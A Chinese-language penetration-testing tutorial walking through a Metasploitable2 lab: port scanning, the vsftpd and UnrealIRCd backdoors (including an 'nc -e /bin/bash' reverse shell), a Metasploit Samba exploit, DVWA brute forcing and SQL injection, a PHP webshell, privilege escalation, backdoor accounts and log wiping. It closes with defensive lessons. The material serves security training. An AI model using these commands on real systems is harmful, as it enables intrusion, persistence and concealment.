网络安全入门：从零搭建Metasploitable2靶机环境与漏洞利用实战

1. 项目概述：为什么选择Metasploitable2作为你的第一台“陪练”靶机？

如果你刚开始接触网络安全，或者想找一个能让你“为所欲为”但又不会惹上麻烦的练习环境，Metasploitable2绝对是你绕不开的名字。它不是一台真实的服务器，而是一个被故意设计得千疮百孔的虚拟机镜像。你可以把它想象成一个专门为安全爱好者准备的“漏洞博物馆”，里面预装了各种过时的、存在已知漏洞的软件和服务，从古老的Apache、FTP到有问题的数据库，一应俱全。

我当年入门渗透测试，就是从折腾它开始的。市面上靶机很多，比如VulnHub上那些剧情丰富的DC系列、Mr.Robot，它们更像是一个个解谜游戏，需要你综合运用各种技巧。而Metasploitable2不同，它的定位非常纯粹：教学与练习。它的漏洞大多是经典的、教科书式的，比如未授权访问、弱密码、缓冲区溢出、命令注入等。这意味着，你几乎可以在这里找到所有基础漏洞的“标准答案”，非常适合用来验证你学到的理论，熟悉像Nmap、Metasploit、Nessus这些核心工具的基本操作。

很多人一上来就想挑战高难度靶机，结果在信息收集阶段就卡住了，挫败感很强。Metasploitable2则提供了一个非常友好的起点。它的网络服务是“敞开”的，端口扫描结果会给你一大堆明显的“攻击面”，让你能快速获得正反馈，建立起“发现漏洞-利用漏洞-获取权限”的基本逻辑链条。这正是我推荐所有新手从这里开始的原因：先学会走，再想着跑。接下来，我会带你从零开始，完成从虚拟机环境搭建，到信息收集，再到亲手利用几个经典漏洞获取系统权限的全过程。整个过程就像一次标准的安全评估演练，我会把每个步骤背后的“为什么”和你可能踩的“坑”都讲清楚。

2. 环境搭建与网络配置：打造你的专属“黑客”实验室

工欲善其事，必先利其器。在开始“攻击”之前，我们需要一个安全、隔离的实验环境。最经典的搭配就是使用VMware Workstation或VirtualBox，同时运行Kali Linux（攻击机）和Metasploitable2（靶机）。这样能确保所有操作都在你的个人电脑内闭环，不会影响到真实网络。

2.1 获取与导入靶机镜像

首先，你需要下载Metasploitable2的镜像文件。它是一个压缩包，解压后你会得到一个.vmx（VMware）或.ovf（VirtualBox）文件。这里我以VMware Workstation为例，VirtualBox的操作大同小异。

1. 下载镜像：你可以从SourceForge等可信源找到它。下载后解压到一个你容易找到的目录，比如D:\VMs\Metasploitable2。
2. 导入虚拟机：打开VMware，点击“文件”->“打开”，找到并选择解压出来的.vmx文件。VMware会自动识别并创建一台名为“Metasploitable2-Linux”的虚拟机。
3. 关键配置调整：导入后先别急着启动，有几处设置必须调整：
   • 网络适配器：这是最重要的一步。将网络连接模式设置为“仅主机模式”。这个模式会在你的物理机上创建一个虚拟的私有网络（比如VMnet1），只有Kali和Metasploitable2这两台虚拟机在这个网络里能互相通信，它们无法访问外网，外网也无法访问它们，完美隔离。
   • 内存：分配给靶机512MB内存就足够了，它本身很轻量。
   • 快照：在启动前，强烈建议你为这台干净的靶机创建一个快照，命名为“Initial State”。这样无论后续练习中你把系统搞得多乱，都可以一键恢复到最初状态，非常方便。

注意：很多新手会忽略网络模式，使用默认的“NAT模式”。这可能导致你的Kali无法稳定地扫描到靶机的所有端口，或者因为IP地址变化而连接失败。“仅主机模式”是这类本地渗透测试最稳定、最标准的配置。

2.2 配置攻击机（Kali Linux）与网络连通性

你的Kali Linux虚拟机也需要进行同样的网络设置，将其网络适配器也改为“仅主机模式”，并且要和Metasploitable2使用同一个虚拟网络（在VMware的“虚拟网络编辑器”里可以查看，默认的仅主机模式网络通常是VMnet1）。

启动两台虚拟机。Metasploitable2启动后会自动登录，用户名为msfadmin，密码也是msfadmin。它默认不会显示图形界面，就是一个命令行终端。你需要在这里查看它的IP地址。输入命令ifconfig，找到eth0网卡，记下它的inet addr，通常是192.168.xxx.xxx网段的一个地址，例如192.168.1.102。

接着，在Kali Linux中打开终端，也输入ifconfig查看自己的IP，确保两者在同一网段（例如Kali是192.168.1.101）。然后，用最基本的ping命令测试连通性：ping 192.168.1.102。如果能看到连续的回复，恭喜你，网络通道已经打通，你的“攻击实验室”基础建设完成了。

2.3 环境验证与初步信息收集

在真正开始漏洞利用前，我们先做一个最简单的验证，感受一下靶机的“开放性”。在Kali上，尝试用默认凭证登录靶机的SSH服务。命令如下：

ssh msfadmin@192.168.1.102

系统会询问你是否继续连接并提示输入密码，输入msfadmin。如果成功登录，你会看到Metasploitable2的命令行提示符。这证明了服务是可访问的，并且使用了弱密码。这只是开胃小菜，我们马上要进行更全面的侦查。

3. 信息收集与漏洞侦查：像侦探一样扫描你的目标

渗透测试中，信息收集往往决定了后续攻击的效率和成功率。对于Metasploitable2，我们需要系统地摸清它到底开放了哪些门（端口），门上挂着什么牌子（服务及版本）。

3.1 全面端口扫描与服务识别

我们将使用渗透测试界的“瑞士军刀”——Nmap。打开Kali的终端，输入以下命令进行快速扫描：

nmap -sV -O 192.168.1.102

• -sV: 探测端口上运行的服务及其版本信息。这是关键，很多漏洞都针对特定版本。
• -O: 尝试识别靶机的操作系统。

扫描完成后，你会看到一个令人“惊喜”的结果。Metasploitable2通常会开放20多个端口，包括：

• 21/tcp: FTP (vsftpd 2.3.4) - 一个存在后门漏洞的版本。
• 22/tcp: SSH (OpenSSH 4.7p1) - 版本较旧，可能存在漏洞。
• 23/tcp: Telnet - 明文传输协议，非常不安全。
• 80/tcp: HTTP (Apache 2.2.8) - Web服务器，是重点攻击面。
• 111/tcp: rpcbind
• 139/tcp, 445/tcp: Samba (smbd 3.x) - 文件共享服务，有著名的漏洞。
• 512/tcp, 513/tcp, 514/tcp: r服务
• 1524/tcp: 一个绑定到root shell的端口（著名的后门）。
• 2049/tcp: NFS
• 3306/tcp: MySQL - 数据库，默认存在弱密码。
• 5432/tcp: PostgreSQL - 另一个数据库，同样有弱密码。
• 8009/tcp, 8180/tcp: Apache Tomcat - Java应用服务器。

这份列表就是我们的“攻击菜单”。接下来，我们需要对重点服务进行更深入的侦查。

3.2 针对性服务探测与漏洞初判

仅仅知道端口和服务版本还不够，我们需要知道这些服务具体怎么访问，有什么功能。这里以Web服务（80端口）和Samba服务（445端口）为例。

Web服务侦查：在Kali的浏览器中直接访问http://192.168.1.102。你会看到Metasploitable2的默认主页，上面列出了它安装的所有有漏洞的Web应用，如DVWA、Mutillidae、phpMyAdmin等。点击这些链接，你可以初步浏览。同时，我们可以使用nikto或dirb这样的Web路径扫描工具，发现更多隐藏的目录和文件：

dirb http://192.168.1.102 /usr/share/wordlists/dirb/common.txt

这个命令会尝试用常见路径名去碰撞，可能会发现后台登录页面、配置文件等敏感信息。

Samba服务侦查：Samba是Linux/Unix和Windows之间文件共享的协议。我们可以用smbclient工具来枚举可用的共享目录：

smbclient -L //192.168.1.102/ -N

-L参数列出共享，-N表示匿名登录（不提供密码）。你会发现靶机上有诸如tmp这样的可匿名访问的共享。这本身就是一个信息泄露漏洞。

3.3 自动化漏洞扫描辅助

对于新手，手动分析这么多服务可能有些吃力。这时可以借助自动化漏洞扫描器，如OpenVAS或Nessus，但它们配置稍复杂。一个更轻量的选择是使用nmap的漏洞脚本引擎（NSE）。例如，扫描常见的已知漏洞：

nmap --script vuln 192.168.1.102

这个命令会运行所有归类为vuln的NSE脚本，针对目标服务进行检测，并直接输出可能存在的漏洞，例如vsftpd后门、Samba漏洞等。但请注意，自动化工具的结果需要人工研判，它可能产生误报或漏报，绝不能完全依赖。它更适合作为我们手动侦查的补充和线索提示。

4. 经典漏洞利用实战：手把手教你“攻破”系统

信息收集完毕，我们手里有了一张清晰的“地图”。现在，让我们选择几个最具代表性的漏洞，进行实际的利用演练。我会从易到难，展示不同的攻击路径。

4.1 漏洞一：利用vsftpd 2.3.4后门获取Shell

这是Metasploitable2里最“直白”的漏洞之一。vsftpd 2.3.4版本被植入了一个恶意后门，当用户名以“:)”结尾时，会触发一个监听在6200端口的root权限后门。

1. 漏洞验证：首先，我们用Nmap或手动连接验证FTP服务版本。

   nc -nv 192.168.1.102 21

   连接后，服务器会返回220 (vsFTPd 2.3.4)，确认版本存在风险。

2. 触发后门：使用任意FTP客户端，或者继续用nc，尝试以user: )作为用户名登录（密码任意）。

   ftp 192.168.1.102 Connected to 192.168.1.102. 220 (vsFTPd 2.3.4) Name (192.168.1.102:kali): user: ) 331 Please specify the password. Password: <随便输入，如123> 530 Login incorrect. Login failed.

   登录会失败，但这不重要。关键是在我们尝试登录的同时，后门已经被触发，在靶机的6200端口上打开了一个root shell。

3. 连接后门：立即在Kali上打开另一个终端，用nc连接靶机的6200端口。

   nc -nv 192.168.1.102 6200

   如果成功，你会直接获得一个命令行提示符，而且权限很可能是root！输入id或whoami命令确认权限。恭喜，你已经通过一个简单的服务漏洞，直接拿到了系统的最高控制权。

实操心得：这个漏洞利用过程非常快，几乎是“秒杀”。它完美地演示了使用存在后门的软件是多么危险。在实际工作中，确保所有对外服务都使用最新、官方来源的软件版本是安全基线中的底线。

4.2 漏洞二：利用UnrealIRCd后门获取Shell

Metasploitable2还运行着一个旧版本的UnrealIRCd（互联网中继聊天守护进程），其3.2.8.1版本同样被植入了后门。这个后门隐藏在AB命令中。

1. 发现服务：在之前的Nmap扫描结果中，你应该能看到6667端口运行着irc服务。

   nc -nv 192.168.1.102 6667

   连接后，服务器会返回类似:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...的信息。

2. 触发后门：IRC协议中，AB是用于服务器间认证的命令，但在这个后门版本中，它被滥用了。我们直接发送包含后门命令的AB报文。在nc连接后，输入：

   AB; nc -e /bin/bash 192.168.1.101 4444

   这条命令的意思是，让靶机执行nc -e /bin/bash 192.168.1.101 4444，即用/bin/bash反向连接到我们Kali（IP: 192.168.1.101）的4444端口。

3. 接收反向Shell：在发送上述命令前，我们需要先在Kali上监听4444端口。

   nc -nlvp 4444

   然后，在连接到6667端口的那个终端里发送AB;命令。稍等片刻，你监听4444端口的终端就会接收到一个来自靶机的连接，并得到一个Shell。同样，用id命令检查权限。

注意事项：这里使用的是反向Shell。为什么是反向？因为靶机可能位于防火墙或NAT之后，我们无法直接从外部连接到它的某个端口。但让靶机主动“打电话”出来连接到我们监听的端口，往往能绕过这种限制。这是渗透测试中获取Shell的常用技巧。

4.3 漏洞三：利用Samba “username map script”命令注入漏洞提权

Samba的username map script配置项允许通过%u参数将用户名传递给外部脚本。如果配置不当（在Metasploitable2中正是如此），攻击者可以在用户名中注入命令。

1. 漏洞原理：Samba服务在验证用户时，会尝试将用户名传递给/etc/samba/smb.conf中配置的脚本。Metasploitable2的配置中，该脚本调用方式不安全，允许命令注入。

2. 利用过程：这次我们不手动构造数据包，而是使用Metasploit框架，这是渗透测试中最强大的集成化工具。在Kali终端中输入msfconsole启动Metasploit。

   • 搜索漏洞模块：在msf提示符下，输入search samba username，可以找到一个名为exploit/multi/samba/usermap_script的模块。
   • 使用模块：输入use exploit/multi/samba/usermap_script。
   • 设置参数：查看需要设置的参数：show options。
     • 设置靶机RHOSTS:set RHOSTS 192.168.1.102
     • 设置本地监听LHOST（你的Kali IP）:set LHOST 192.168.1.101
   • 执行攻击：输入run或exploit。 如果一切顺利，Metasploit会自动化完成漏洞利用，并为你打开一个Meterpreter会话。Meterpreter是一个功能强大的后渗透工具，你可以在里面执行命令、上传下载文件、抓取密码哈希等。输入shell命令可以切换到标准的Linux shell。

3. 权限提升验证：在获取的Shell中，输入whoami，你可能会发现当前用户是root，或者是一个普通用户（如daemon）。如果是普通用户，我们可以尝试一些本地提权方法。输入sudo -l查看当前用户能以root身份执行哪些命令，或者寻找具有SUID权限的可执行文件（find / -perm -u=s -type f 2>/dev/null）。在Metasploitable2中，往往很容易找到提权路径。

实操心得：从手动利用到使用Metasploit，体现了渗透测试的不同阶段。手动利用能让你深刻理解漏洞原理，而Metasploit这样的自动化框架则极大地提高了效率，尤其是在利用复杂漏洞或进行批量测试时。但切记，工具是辅助，理解原理才是根本。

5. Web应用漏洞挖掘：深入DVWA与phpMyAdmin

Metasploitable2的80端口上集成了多个有漏洞的Web应用，它们是练习Web安全的绝佳场地。我们以DVWA和phpMyAdmin为例。

5.1 DVWA：从暴力破解到SQL注入

访问http://192.168.1.102/dvwa，使用默认账号admin和密码password登录。DVWA将安全等级分为Low、Medium、High、Impossible，我们可以从Low开始。

• 暴力破解：在Brute Force模块，Low级别没有任何防护。我们可以使用Burp Suite的Intruder模块，或者Kali自带的hydra工具进行爆破。

  hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.102 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect"

  这个命令尝试用rockyou.txt密码字典对用户admin进行爆破。在Low级别下，你会很快看到成功结果。

• SQL注入：在SQL Injection模块，Low级别的输入完全未过滤。在输入框输入1' or '1'='1，很可能直接返回所有用户信息。我们可以使用更专业的工具sqlmap进行自动化注入和拖库：

  sqlmap -u "http://192.168.1.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=你的会话ID; security=low" --batch

  --cookie参数很重要，因为DVWA需要登录状态。sqlmap会自动检测注入类型，并可以帮你获取数据库名、表名、甚至数据内容。

5.2 phpMyAdmin弱密码与文件包含

访问http://192.168.1.102/phpmyadmin。Metasploitable2中的phpMyAdmin存在弱密码：root用户密码为空。直接使用root/空密码登录，你将获得MySQL数据库的完全控制权。

一旦进入phpMyAdmin，危害极大：

1. 数据窃取：可以直接查看、导出所有数据库中的数据。
2. 写入WebShell：如果知道Web目录的绝对路径（通常可以通过DVWA的phpinfo页面查到），可以在phpMyAdmin中执行SQL语句，向Web目录写入一个PHP文件，内容为<?php system($_GET[‘cmd’]);?>，这样就获得了一个Web后门。

   SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/dvwa/hack.php"

   执行成功后，访问http://192.168.1.102/dvwa/hack.php?cmd=id，就能执行系统命令。

注意事项：phpMyAdmin、MySQL这类管理界面和数据库服务，绝对不应该使用弱密码或允许从公网直接访问。它们一旦被攻破，往往意味着整个应用乃至服务器的沦陷。这也是为什么在真实环境中，这些服务通常只监听本地地址（127.0.0.1），并通过SSH隧道等方式进行管理。

6. 后渗透与权限维持：进入系统后做什么？

拿到一个Shell（即使是普通用户）并不是终点，而是另一个起点。后渗透阶段的目标是：提升权限、扩大战果、维持访问。

6.1 信息收集与权限提升

在获得的Shell中，系统性地收集信息：

• uname -a: 查看内核版本，寻找对应的本地提权漏洞。
• cat /etc/passwd: 查看系统用户。
• cat /etc/shadow: 尝试读取密码哈希文件（需要root权限）。
• ps aux: 查看运行进程，寻找以root运行的服务或程序。
• find / -perm -u=s -type f 2>/dev/null: 查找SUID文件，这些文件运行时可能继承所有者（常为root）权限。
• sudo -l: 查看当前用户可以以root身份执行哪些命令。

Metasploitable2中通常存在配置不当的SUID文件或可利用的sudo规则。例如，如果发现/usr/bin/find有SUID位，可以这样提权：

/usr/bin/find . -exec /bin/bash -p \;

-p参数会让bash保留SUID赋予的高权限，从而得到一个root shell。

6.2 维持访问与痕迹清理

在真实测试中（获得授权后），为了后续方便进入，攻击者通常会创建后门账户或安装木马。

• 添加用户：useradd -m -s /bin/bash backdoor然后passwd backdoor设置密码。或者直接编辑/etc/passwd和/etc/shadow，添加一个UID为0（root）的用户。
• SSH密钥后门：将你的公钥写入靶机root用户的.ssh/authorized_keys文件，即可实现免密登录。
• Metasploit持久化：如果通过Meterpreter进入，可以使用persistence模块创建计划任务或服务实现自启动。

痕迹清理（仅用于练习和理解防御）：删除命令历史（history -c，清空~/.bash_history），删除你上传的工具，删除Webshell，删除系统日志中与你IP相关的记录（如/var/log/auth.log,/var/log/apache2/access.log）等。但要注意，专业的系统管理员会使用集中日志，清理本地日志可能适得其反。

7. 常见问题、排查与防御思考

在实战练习中，你肯定会遇到各种问题。这里记录一些典型情况和我踩过的坑。

7.1 连接与扫描问题排查表

7.2 从攻击者视角回归防御

练习攻击的最终目的，是为了更好地防御。通过这次对Metasploitable2的“解剖”，我们可以总结出一些最基本、也最重要的安全准则：

1. 最小化攻击面：关闭所有非必要的服务和端口。Metasploitable2最大的问题就是开了太多老旧且危险的服务。在真实服务器上，只开放业务必须的端口，并使用防火墙严格限制访问源IP。
2. 持续更新与补丁管理：vsftpd后门、UnrealIRCd后门、旧版Samba漏洞，这些都是因为使用了存在已知高危漏洞的软件版本。建立严格的软件更新和补丁管理流程是安全的生命线。
3. 强化身份认证：杜绝弱密码！MySQL、PostgreSQL、系统用户的弱密码是通往核心数据的捷径。启用强密码策略，对重要服务使用密钥认证而非密码，并考虑多因素认证。
4. 最小权限原则：Web应用（如phpMyAdmin）不应以root权限运行数据库操作；Samba共享不应配置可写权限给匿名用户。确保每个进程、每个用户都只拥有完成其功能所必需的最小权限。
5. 输入验证与过滤：DVWA的SQL注入、命令注入漏洞，根源在于对用户输入毫无信任。所有用户输入都必须经过严格的验证、过滤和转义，特别是在拼接SQL语句、系统命令时。
6. 安全配置：phpMyAdmin等管理界面不应暴露在公网；username map script这类危险配置应被禁用或严格审查；及时清理安装测试时留下的默认页面和文件。
7. 日志与监控：虽然攻击者会尝试清理日志，但集中式的日志收集和实时监控，可以帮助管理员在第一时间发现异常登录、异常命令执行等入侵迹象。

Metasploitable2是一个完美的“反面教材”。把它摸透，你就能深刻理解这些安全原则背后的血泪教训。当你未来自己搭建服务器或审计系统时，你会本能地检查端口、更新软件、强化密码、审查配置——这正是我们进行靶机练习的核心价值所在。它不是教你成为黑客，而是让你具备一双能发现漏洞、理解风险的安全之眼。